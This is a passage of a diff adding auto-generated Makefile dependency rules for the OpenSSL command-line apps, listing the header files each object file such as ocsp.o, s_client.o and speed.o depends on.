+nseq.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+nseq.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+nseq.o: ../include/openssl/err.h ../include/openssl/evp.h
+nseq.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+nseq.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+nseq.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+nseq.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+nseq.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+nseq.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+nseq.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+nseq.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+nseq.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h nseq.c
+ocsp.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ocsp.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ocsp.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ocsp.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ocsp.o: ../include/openssl/err.h ../include/openssl/evp.h
+ocsp.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ocsp.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ocsp.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+ocsp.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ocsp.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+ocsp.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+ocsp.o: ../include/openssl/pqueue.h ../include/openssl/safestack.h
+ocsp.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+ocsp.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+ocsp.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+ocsp.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+ocsp.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+ocsp.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ocsp.o: ../include/openssl/x509v3.h apps.h ocsp.c
+openssl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+openssl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+openssl.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+openssl.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+openssl.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+openssl.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+openssl.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+openssl.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+openssl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+openssl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+openssl.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+openssl.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+openssl.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+openssl.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+openssl.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+openssl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+openssl.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+openssl.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+openssl.o: ../include/openssl/x509v3.h apps.h openssl.c progs.h s_apps.h
+passwd.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+passwd.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+passwd.o: ../include/openssl/crypto.h ../include/openssl/des.h
+passwd.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+passwd.o: ../include/openssl/err.h ../include/openssl/evp.h
+passwd.o: ../include/openssl/lhash.h ../include/openssl/md5.h
+passwd.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+passwd.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+passwd.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+passwd.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+passwd.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+passwd.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+passwd.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+passwd.o: ../include/openssl/ui_compat.h ../include/openssl/x509.h
+passwd.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+passwd.o: passwd.c
+pkcs12.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs12.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs12.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs12.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs12.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs12.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs12.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs12.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs12.o: ../include/openssl/pem2.h ../include/openssl/pkcs12.h
+pkcs12.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+pkcs12.o: ../include/openssl/sha.h ../include/openssl/stack.h
+pkcs12.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+pkcs12.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+pkcs12.o: ../include/openssl/x509v3.h apps.h pkcs12.c
+pkcs7.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs7.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs7.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs7.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs7.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs7.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs7.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs7.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs7.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkcs7.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkcs7.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkcs7.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkcs7.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkcs7.o: pkcs7.c
+pkcs8.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkcs8.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkcs8.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkcs8.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkcs8.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkcs8.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkcs8.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkcs8.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkcs8.o: ../include/openssl/pem2.h ../include/openssl/pkcs12.h
+pkcs8.o: ../include/openssl/pkcs7.h ../include/openssl/safestack.h
+pkcs8.o: ../include/openssl/sha.h ../include/openssl/stack.h
+pkcs8.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+pkcs8.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+pkcs8.o: ../include/openssl/x509v3.h apps.h pkcs8.c
+pkey.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkey.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkey.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkey.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkey.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkey.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkey.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkey.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkey.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkey.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkey.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkey.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkey.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h pkey.c
+pkeyparam.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkeyparam.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkeyparam.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkeyparam.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkeyparam.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkeyparam.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkeyparam.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkeyparam.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkeyparam.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkeyparam.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkeyparam.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkeyparam.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkeyparam.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkeyparam.o: pkeyparam.c
+pkeyutl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+pkeyutl.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+pkeyutl.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+pkeyutl.o: ../include/openssl/err.h ../include/openssl/evp.h
+pkeyutl.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+pkeyutl.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+pkeyutl.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+pkeyutl.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+pkeyutl.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+pkeyutl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+pkeyutl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+pkeyutl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+pkeyutl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+pkeyutl.o: pkeyutl.c
+prime.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+prime.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+prime.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+prime.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+prime.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+prime.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+prime.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+prime.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+prime.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+prime.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+prime.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+prime.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+prime.o: prime.c
+rand.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rand.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+rand.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+rand.o: ../include/openssl/err.h ../include/openssl/evp.h
+rand.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+rand.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+rand.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+rand.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+rand.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+rand.o: ../include/openssl/sha.h ../include/openssl/stack.h
+rand.o: ../include/openssl/symhacks.h ../include/openssl/txt_db.h
+rand.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+rand.o: ../include/openssl/x509v3.h apps.h rand.c
+req.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+req.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+req.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+req.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+req.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+req.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+req.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+req.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+req.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+req.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+req.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+req.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+req.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+req.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+req.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h req.c
+rsa.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsa.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+rsa.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+rsa.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsa.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+rsa.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rsa.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+rsa.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsa.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+rsa.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+rsa.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+rsa.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+rsa.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+rsa.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h rsa.c
+rsautl.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsautl.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+rsautl.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+rsautl.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsautl.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+rsautl.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rsautl.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+rsautl.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsautl.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+rsautl.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+rsautl.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+rsautl.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+rsautl.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+rsautl.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+rsautl.o: rsautl.c
+s_cb.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_cb.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+s_cb.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+s_cb.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_cb.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_cb.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_cb.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_cb.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_cb.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_cb.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_cb.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_cb.o: ../include/openssl/rand.h ../include/openssl/safestack.h
+s_cb.o: ../include/openssl/sha.h ../include/openssl/srtp.h
+s_cb.o: ../include/openssl/ssl.h ../include/openssl/ssl2.h
+s_cb.o: ../include/openssl/ssl23.h ../include/openssl/ssl3.h
+s_cb.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+s_cb.o: ../include/openssl/tls1.h ../include/openssl/txt_db.h
+s_cb.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+s_cb.o: ../include/openssl/x509v3.h apps.h s_apps.h s_cb.c
+s_client.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_client.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+s_client.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_client.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s_client.o: ../include/openssl/err.h ../include/openssl/evp.h
+s_client.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+s_client.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+s_client.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+s_client.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+s_client.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+s_client.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+s_client.o: ../include/openssl/pqueue.h ../include/openssl/rand.h
+s_client.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_client.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_client.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_client.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_client.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_client.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_client.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_client.o: s_apps.h s_client.c timeouts.h
+s_server.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_server.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+s_server.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_server.o: ../include/openssl/dh.h ../include/openssl/dtls1.h
+s_server.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_server.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_server.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_server.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_server.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_server.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_server.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_server.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_server.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+s_server.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_server.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_server.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_server.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_server.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_server.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_server.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_server.o: s_apps.h s_server.c timeouts.h
+s_socket.o: ../e_os.h ../e_os2.h ../include/openssl/asn1.h
+s_socket.o: ../include/openssl/bio.h ../include/openssl/buffer.h
+s_socket.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+s_socket.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+s_socket.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_socket.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_socket.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_socket.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_socket.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_socket.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_socket.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_socket.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_socket.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_socket.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_socket.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_socket.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_socket.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_socket.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_socket.o: s_apps.h s_socket.c
+s_time.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+s_time.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+s_time.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+s_time.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+s_time.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+s_time.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+s_time.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+s_time.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+s_time.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+s_time.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+s_time.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+s_time.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+s_time.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+s_time.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+s_time.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+s_time.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+s_time.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+s_time.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+s_time.o: s_apps.h s_time.c
+sess_id.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+sess_id.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+sess_id.o: ../include/openssl/crypto.h ../include/openssl/dtls1.h
+sess_id.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+sess_id.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+sess_id.o: ../include/openssl/kssl.h ../include/openssl/lhash.h
+sess_id.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+sess_id.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+sess_id.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+sess_id.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+sess_id.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+sess_id.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+sess_id.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+sess_id.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+sess_id.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+sess_id.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+sess_id.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+sess_id.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+sess_id.o: sess_id.c
+smime.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+smime.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+smime.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+smime.o: ../include/openssl/err.h ../include/openssl/evp.h
+smime.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+smime.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+smime.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+smime.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+smime.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+smime.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+smime.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+smime.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+smime.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+smime.o: smime.c
+speed.o: ../e_os.h ../include/openssl/aes.h ../include/openssl/asn1.h
+speed.o: ../include/openssl/bio.h ../include/openssl/blowfish.h
+speed.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+speed.o: ../include/openssl/camellia.h ../include/openssl/cast.h
+speed.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+speed.o: ../include/openssl/des.h ../include/openssl/des_old.h
+speed.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+speed.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+speed.o: ../include/openssl/evp.h ../include/openssl/hmac.h
+speed.o: ../include/openssl/lhash.h ../include/openssl/md4.h
+speed.o: ../include/openssl/md5.h ../include/openssl/mdc2.h
+speed.o: ../include/openssl/modes.h ../include/openssl/obj_mac.h
+speed.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+speed.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+speed.o: ../include/openssl/ossl_typ.h ../include/openssl/pkcs7.h
+speed.o: ../include/openssl/rand.h ../include/openssl/rc2.h
+speed.o: ../include/openssl/rc4.h ../include/openssl/ripemd.h
+speed.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+speed.o: ../include/openssl/seed.h ../include/openssl/sha.h
+speed.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+speed.o: ../include/openssl/txt_db.h ../include/openssl/ui.h
+speed.o: ../include/openssl/ui_compat.h ../include/openssl/whrlpool.h
+speed.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+speed.o: ../include/openssl/x509v3.h apps.h speed.c testdsa.h testrsa.h
+spkac.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+spkac.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+spkac.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+spkac.o: ../include/openssl/err.h ../include/openssl/evp.h
+spkac.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+spkac.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+spkac.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+spkac.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+spkac.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+spkac.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+spkac.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+spkac.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+spkac.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+spkac.o: spkac.c
+srp.o: ../include/openssl/opensslconf.h srp.c
+ts.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ts.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ts.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ts.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+ts.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+ts.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+ts.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+ts.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+ts.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ts.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ts.o: ../include/openssl/pkcs7.h ../include/openssl/rand.h
+ts.o: ../include/openssl/rsa.h ../include/openssl/safestack.h
+ts.o: ../include/openssl/sha.h ../include/openssl/stack.h
+ts.o: ../include/openssl/symhacks.h ../include/openssl/ts.h
+ts.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+ts.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h ts.c
+verify.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+verify.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+verify.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+verify.o: ../include/openssl/err.h ../include/openssl/evp.h
+verify.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+verify.o: ../include/openssl/objects.h ../include/openssl/ocsp.h
+verify.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+verify.o: ../include/openssl/ossl_typ.h ../include/openssl/pem.h
+verify.o: ../include/openssl/pem2.h ../include/openssl/pkcs7.h
+verify.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+verify.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+verify.o: ../include/openssl/txt_db.h ../include/openssl/x509.h
+verify.o: ../include/openssl/x509_vfy.h ../include/openssl/x509v3.h apps.h
+verify.o: verify.c
+version.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+version.o: ../include/openssl/blowfish.h ../include/openssl/bn.h
+version.o: ../include/openssl/buffer.h ../include/openssl/conf.h
+version.o: ../include/openssl/crypto.h ../include/openssl/des.h
+version.o: ../include/openssl/des_old.h ../include/openssl/e_os2.h
+version.o: ../include/openssl/evp.h ../include/openssl/lhash.h
+version.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+version.o: ../include/openssl/ocsp.h ../include/openssl/opensslconf.h
+version.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+version.o: ../include/openssl/pkcs7.h ../include/openssl/rc4.h
+version.o: ../include/openssl/safestack.h ../include/openssl/sha.h
